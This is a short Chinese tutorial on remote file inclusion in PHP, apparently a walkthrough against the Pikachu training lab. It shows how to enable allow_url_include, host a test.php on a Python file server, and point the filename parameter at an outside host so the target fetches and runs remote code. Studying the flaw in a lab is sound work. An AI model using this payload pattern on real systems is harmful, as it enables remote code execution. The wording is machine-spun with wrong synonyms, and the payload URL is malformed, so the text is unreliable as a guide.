远程文件包罗漏洞
是指能够包罗远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在,危害性会很大。但远程文件包罗漏洞的利用条件较为苛刻;因此,在web应用体系的功能计划上只管不要让前端用户直接传变量给包罗函数,如果非要这么做,也肯定要做严格的白名单策略举行过滤。
PHP的需要php.ini中配置
- allow_url_fopen=On // 默认情况下是打开的;
- allow_url_include=On // 默认情况下是关闭的;
开启配置
文件所在位置:
- /etc/php/7.3/apache2/php.ini
修改完成后,
重启容器,
- exit #退出当前容器的/bin/bash
- docker ps #查找当前容器id
- docker restart 4e4ccb0e81d2 #重启pikachu容器
再次访问,没有了告警;
首先,在D盘下构造一个 test.php 文件 ,
python 搭一个本地文件服务器
再次哀求远程文件包罗, filename 的值改为http://192.168.3.218:8000:test.php
可以看到,phpinfo 已经体现;
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
